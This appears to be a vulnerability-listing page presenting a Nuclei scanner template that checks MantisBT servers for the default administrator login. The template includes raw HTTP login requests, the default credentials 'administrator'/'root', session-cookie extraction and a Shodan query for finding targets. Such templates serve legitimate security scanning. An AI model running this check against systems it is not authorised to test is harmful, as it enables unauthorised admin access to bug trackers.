漏洞描述
A MantisBT default admin login was discovered.
mantisbt-default-credential: MantisBT Default Admin Login
PoC代码[已公开]
id: mantisbt-default-credential
info:
name: MantisBT Default Admin Login
author: For3stCo1d,YashVardhanTripathi
severity: high
description: A MantisBT default admin login was discovered.
reference:
- https://mantisbt.org/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
cpe: cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: title:"MantisBT"
product: mantisbt
vendor: mantisbt
tags: mantisbt,default-login,vuln
http:
- raw:
- |
GET /login_password_page.php HTTP/1.1
Host: {{Hostname}}
- |
POST /login_password_page.php HTTP/1.1
Host: {{Hostname}}
Cookie: MANTIS_secure_session=1; PHPSESSID={{session}}
Content-Type: application/x-www-form-urlencoded
return=index.php&username={{username}}
- |
POST /login_password_page.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: MANTIS_secure_session=1; PHPSESSID={{session}}
return=index.php&username={{username}}&password={{password}}&secure_session=on
- |
GET /my_view_page.php HTTP/1.1
Host: {{Hostname}}
attack: pitchfork
payloads:
username:
- administrator
password:
- root
matchers-condition: and
matchers:
- type: word
part: body_4
words:
- "View Issues"
- "Change Log"
condition: and
- type: regex
part: header_3
regex:
- "Location: .*?/login_cookie_test.php\\?return=account_page.php"
- type: status
status:
- 200
extractors:
- type: regex
name: session
internal: true
group: 1
part: header
regex:
- "PHPSESSID=([a-zA-Z0-9]+);"
# digest: 490a0046304402205ec41199664dd311074ac83b22ff6367ebf9de3911c072c82ecd718dc72baeed02205ab9ce1ab4a28f020def4dbda9a0931ab6e39337e20f68c4ccc811ba5a3e340d:922c64590222798bb761d5b6d8e72950